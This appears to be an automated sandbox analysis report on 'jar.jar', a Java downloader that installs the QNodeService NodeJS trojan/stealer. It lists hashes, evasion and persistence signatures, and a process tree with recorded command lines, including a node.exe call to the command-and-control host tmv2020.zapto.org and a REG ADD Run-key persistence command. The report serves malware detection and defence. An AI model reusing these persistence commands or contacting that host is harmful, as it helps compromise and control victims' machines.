jar.jar

General
Target

jar.jar

Filesize

81KB

Completed

19-11-2020 12:27

Score
10/10
MD5

9e8b6710fdd55ad0675295c2c3960732

SHA1

aed08772376bde9f848f335e77e2e3c3c230234d

SHA256

f2fb2d0c469abc0add346ef809ad86e0194400d391a2e5429b8cbeea2711bbad

Malware Config
Signatures 8

Filter: none

Defense Evasion
Discovery
Persistence
  • QNodeService

    Description

    Trojan/stealer written in NodeJS and spread via Java downloader.

  • Executes dropped EXE
    node.exenode.exenode.exe

    Reported IOCs

    pidprocess
    3524node.exe
    2652node.exe
    1200node.exe
  • Adds Run key to start application
    reg.exe

    TTPs

    Registry Run Keys / Startup FolderModify Registry

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Runreg.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\cf695db1-96d2-45d6-a745-87e554e6cd0d = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\""reg.exe
  • JavaScript code in executable

    Reported IOCs

    resourceyara_rule
    behavioral2/files/0x000100000001ab51-170.datjs
    behavioral2/files/0x000100000001ab51-174.datjs
    behavioral2/files/0x000100000001ab51-178.datjs
  • Looks up external IP address via web service

    Description

    Uses a legitimate IP lookup service to find the infected system's external IP.

    Reported IOCs

    flowioc
    21wtfismyip.com
    22wtfismyip.com
  • Checks processor information in registry
    node.exe

    Description

    Processor information is often read in order to detect sandboxing environments.

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key opened\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0node.exe
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHznode.exe
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameStringnode.exe
    Key opened\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1node.exe
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHznode.exe
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameStringnode.exe
  • Suspicious behavior: EnumeratesProcesses
    node.exenode.exenode.exe

    Reported IOCs

    pidprocess
    3524node.exe
    3524node.exe
    3524node.exe
    3524node.exe
    2652node.exe
    2652node.exe
    2652node.exe
    2652node.exe
    1200node.exe
    1200node.exe
    1200node.exe
    1200node.exe
    1200node.exe
    1200node.exe
    1200node.exe
    1200node.exe
    1200node.exe
    1200node.exe
  • Suspicious use of WriteProcessMemory
    java.exejavaw.exenode.exenode.exenode.execmd.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 2868 wrote to memory of 37442868java.exejavaw.exe
    PID 2868 wrote to memory of 37442868java.exejavaw.exe
    PID 3744 wrote to memory of 35243744javaw.exenode.exe
    PID 3744 wrote to memory of 35243744javaw.exenode.exe
    PID 3524 wrote to memory of 26523524node.exenode.exe
    PID 3524 wrote to memory of 26523524node.exenode.exe
    PID 2652 wrote to memory of 12002652node.exenode.exe
    PID 2652 wrote to memory of 12002652node.exenode.exe
    PID 1200 wrote to memory of 8481200node.execmd.exe
    PID 1200 wrote to memory of 8481200node.execmd.exe
    PID 848 wrote to memory of 4032848cmd.exereg.exe
    PID 848 wrote to memory of 4032848cmd.exereg.exe
Processes 7
  • C:\ProgramData\Oracle\Java\javapath\java.exe
    java -jar C:\Users\Admin\AppData\Local\Temp\jar.jar
    Suspicious use of WriteProcessMemory
    PID:2868
    • C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
      "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\08637946.tmp
      Suspicious use of WriteProcessMemory
      PID:3744
      • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
        C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain tmv2020.zapto.org
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        PID:3524
        • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
          C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_eahL7y\boot.js --hub-domain tmv2020.zapto.org
          Executes dropped EXE
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of WriteProcessMemory
          PID:2652
          • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
            C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_eahL7y\boot.js --hub-domain tmv2020.zapto.org
            Executes dropped EXE
            Checks processor information in registry
            Suspicious behavior: EnumeratesProcesses
            Suspicious use of WriteProcessMemory
            PID:1200
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "cf695db1-96d2-45d6-a745-87e554e6cd0d" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
              Suspicious use of WriteProcessMemory
              PID:848
              • C:\Windows\system32\reg.exe
                REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "cf695db1-96d2-45d6-a745-87e554e6cd0d" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
                Adds Run key to start application
                PID:4032
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Defense Evasion
        Execution
          Exfiltration
            Impact
              Initial Access
                Lateral Movement
                  Privilege Escalation
                    Replay Monitor
                    00:00 00:00
                    Downloads
                    • C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestamp

                      MD5

                      3031a035435f0b9d833559aceedc07c6

                      SHA1

                      e806e287c7b1324969351d6d7b3aa9903bb053f6

                      SHA256

                      df480b78ce4f2811ba6849fbc1e892b4cefc4a6e00f616c9157b7b55c5ce088e

                      SHA512

                      dae7101c4ffc96f8c8f89aaf638253e8199c2973412764e07062e0b75d98cbf0a0d3ef8228b7f14c7ed62e4033e22ce145e451c36b21cc4c2d5cfa6c6349e0d8

                    • C:\Users\Admin\AppData\Local\Temp\08637946.tmp

                      MD5

                      9e8b6710fdd55ad0675295c2c3960732

                      SHA1

                      aed08772376bde9f848f335e77e2e3c3c230234d

                      SHA256

                      f2fb2d0c469abc0add346ef809ad86e0194400d391a2e5429b8cbeea2711bbad

                      SHA512

                      26f94b0b9766e9c244297cbe4af78f1b09087fbe471f099b5a77f5ca76fd5c905ee4d36188af67dbd6dc2c7f8402c882d0d2503a288af277840a1025562eac96

                    • C:\Users\Admin\AppData\Local\Temp\_qhub_node_eahL7y\boot.js

                      MD5

                      3859487feb5152e9d1afc4f8cd320608

                      SHA1

                      7bf154c9ddf3a71abf15906cdb60773e8ae07b62

                      SHA256

                      8d19e156776805eb800ad47f85ff36b99b8283b721ebab3d47a16e2ae597fe13

                      SHA512

                      826a1b3cd08e4652744a975153448288dd31073f60471729b948d7668df8e510fa7b0c6dcd63636043850364bf3cd30c1053349d42d08f8ec7c4a0655188fab8

                    • C:\Users\Admin\node-v14.12.0-win-x64\node.exe

                      MD5

                      f0b11a5823c45fc2664e116dc0323bcb

                      SHA1

                      612339040c1f927ec62186cd5012f4bb9c53c1b9

                      SHA256

                      16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99

                      SHA512

                      0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

                    • C:\Users\Admin\node-v14.12.0-win-x64\node.exe

                      MD5

                      f0b11a5823c45fc2664e116dc0323bcb

                      SHA1

                      612339040c1f927ec62186cd5012f4bb9c53c1b9

                      SHA256

                      16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99

                      SHA512

                      0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

                    • C:\Users\Admin\node-v14.12.0-win-x64\node.exe

                      MD5

                      f0b11a5823c45fc2664e116dc0323bcb

                      SHA1

                      612339040c1f927ec62186cd5012f4bb9c53c1b9

                      SHA256

                      16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99

                      SHA512

                      0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

                    • memory/848-180-0x0000000000000000-mapping.dmp

                    • memory/1200-179-0x0000010C14700000-0x0000010C14701000-memory.dmp

                    • memory/1200-177-0x0000000000000000-mapping.dmp

                    • memory/2652-175-0x0000032D28D00000-0x0000032D28D01000-memory.dmp

                    • memory/2652-173-0x0000000000000000-mapping.dmp

                    • memory/3524-172-0x0000014395980000-0x0000014395981000-memory.dmp

                    • memory/3524-169-0x0000000000000000-mapping.dmp

                    • memory/3744-53-0x0000000000000000-mapping.dmp

                    • memory/4032-181-0x0000000000000000-mapping.dmp